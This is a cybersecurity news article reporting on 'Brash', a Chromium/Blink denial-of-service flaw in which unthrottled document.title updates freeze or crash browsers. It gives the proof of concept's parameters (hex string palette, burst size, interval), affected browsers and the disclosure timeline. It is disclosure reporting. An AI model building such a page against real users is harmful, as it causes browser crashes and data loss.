The Brash Attack: Single Webpage Freezes Chrome/Chromium Browsers in Seconds
Researcher Jose Pino unveiled a proof-of-concept for a vulnerability in the Blink rendering engine used by Chromium-based browsers, demonstrating how a single web page can, within seconds, incapacitate numerous popular browsers and halt a device. Pino published the Brash code, which produced widespread interface degradation and complete tab freezes across most Chromium builds he tested.
The flaw stems from an architectural quirk in the handling of document.title—Blink imposes no rate limit on title updates, allowing a script to inject millions of DOM modifications within milliseconds and saturate the main thread. Pino’s method populates memory with a palette of roughly a hundred unique 512-character hexadecimal strings, then issues rapid bursts of title updates in a high-frequency cadence (for example, burst: 8000, interval: 1ms), yielding tens of millions of attempted mutations per second. Within 5–10 seconds tabs cease responding; by 15–60 seconds the browser either crashes or must be forcibly terminated. In isolated Windows tests a single tab consumed up to 18 GB of RAM and froze the system.
Pino evaluated the PoC across 11 browsers on Android, macOS, Windows and Linux—nine proved vulnerable, including Chrome, Edge, Vivaldi, Arc, Dia, Opera, Perplexity Comet, ChatGPT Atlas and Brave. Two browsers built on alternative engines—Firefox (Gecko) and Safari (WebKit)—did not reproduce the issue, nor did any iOS builds, where WebKit is mandatory. He notified the Chromium team on August 28 and followed up on August 30; receiving no timely remediation, he published the PoC to draw attention to the matter amid apparent public neglect.
Because Chromium downstream vendors maintain their own patches and feature extensions, Pino warns that a universal fix may demand bespoke adaptations by each browser maker—complicating and prolonging mitigation. At the time of publication the vulnerability had not been assigned a public identifier in threat databases; the report and PoC reside on the author’s GitHub, and several vendors have yet to issue detailed statements. Although exploitation does not expose tab contents or permit arbitrary code execution, it can precipitate loss of unsaved data and widespread outages—meaning any visited site could be weaponized into a cause of system failure.
Support Our Threat Intelligence
If you find our technology report and cybersecurity news helpful, consider supporting our work.
Buy Me a Coffee
PayPal
